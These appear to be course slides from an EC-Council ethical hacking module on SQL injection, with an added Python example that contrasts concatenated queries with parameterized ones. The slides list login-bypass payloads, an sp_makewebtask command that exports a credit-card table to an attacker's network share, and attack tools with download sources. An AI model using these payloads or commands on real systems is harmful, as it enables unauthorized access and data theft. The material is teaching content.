Countermeasures
Version 6
Module XIX: SQL Injection
Module Objective
Attacking SQL servers
Countermeasures
Copyright © by EC-Council
EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
What is SQL Injection
It is a technique of injecting SQL commands to exploit non-validated input vulnerabilities in a web application database backend
Programmers use sequential commands with user input, making it easier for attackers to inject commands
Attackers can execute arbitrary SQL commands through the web application
Exploiting Web Applications
Try to look for pages that allow a user to submit data, for example: a login page, search page, feedback, etc.
For example, to check whether it is using POST or GET, look for the <Form>
tag in the source code
<Form action=search.asp method=post>
<input type=hidden name=X value=Z>
</Form>
What If It Doesn’t Take Input
If input is not given, check for pages like ASP, JSP, CGI, or PHP
Example:
• http://www.xsecurity.com/index.asp?id=blah' or 1=1--
OLE DB Errors
The user-filled fields are enclosed by a single quotation mark ('). To test, try using (') as the user name
The following error message will be displayed when a (') is entered into a form that is vulnerable to an SQL injection attack
If you get this error, then the website is vulnerable to an SQL injection attack
Input Validation Attack
SQL Injection Techniques
How to Test for SQL Injection Vulnerability
• blah' or 1=1--
• Login: blah' or 1=1--
• Password: blah' or 1=1--
• http://search/index.asp?id=blah' or 1=1--
Depending on the query, try the following possibilities:
• ' or 1=1--
• " or 1=1--
• ' or 'a'='a
• " or "a"="a
• ') or ('a'='a
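As an added example (not part of the EC-Council module), here is the login query described under "What is SQL Injection" built by string concatenation, next to the same query with bound parameters, run against a constructed in-memory SQLite table so the test strings above can be tried safely. The table, the user name and password, and the `login_*` function names are assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table standing in for the web application's backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_concatenated(conn, name, password):
    """Query built the way the slides describe: user input spliced into the SQL text.

    Returns the matched user names, or an 'error: ...' string when the statement
    no longer parses (the stray-quote tell from the OLE DB Errors slide).
    """
    sql = (f"SELECT name FROM users WHERE name = '{name}' "
           f"AND password = '{password}'")
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"


def login_parameterized(conn, name, password):
    """Same query with bound parameters: the input is only ever data, never SQL."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


if __name__ == "__main__":
    db = make_db()
    # "' or 1=1--" turns the WHERE clause into "name = 'blah' or 1=1" and comments out the rest.
    print(login_concatenated(db, "blah' or 1=1--", "blah"))    # ['alice']
    # "' or 'a'='a" keeps the statement well-formed but makes it always true.
    print(login_concatenated(db, "blah", "blah' or 'a'='a"))   # ['alice']
    # A lone quote breaks the statement: the database error that marks a vulnerable form.
    print(login_concatenated(db, "'", "x"))                     # error: ...
    # The same strings are inert once bound as parameters.
    print(login_parameterized(db, "blah' or 1=1--", "blah"))   # []
    print(login_parameterized(db, "alice", "s3cret"))          # ['alice']
```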
Getting Output of SQL Query
Use sp_makewebtask to write a query into an HTML file
Example
• blah';EXEC master..sp_makewebtask "\\10.10.1.4\share\creditcard.html", "SELECT * FROM CREDITCARD"
• The above command exports a table called CREDITCARD to the attacker's network share
SQL Injection in Oracle
SQL Injection in MySql Database
It is difficult to trace the output
You can see an error because the value retrieved is passed on to multiple queries with different numbers of columns before the script ends
SQL Injection Automated Tools
SQLDict
SqlExec
SQLbf
SQLSmack
SQL2.exe
AppDetective
Database Scanner
SQLPoke
NGSSQLCrack
NGSSQuirreL
SQLPing v2.2
Hacking Tool: SQLDict
Source: http://ntsecurity.nu/cgi-bin/download/sqldict.exe.pl
Hacking Tool: SQLExec
This tool executes commands on compromised Microsoft SQL Servers by using the xp_cmdshell stored procedure
Source: http://phoenix.liu.edu/
Automagic SQL Injector
Features:
Blind SQL Injection
SQL Injection Blocking Tool: SQLBlock
http://www.sqlblock.com
Summary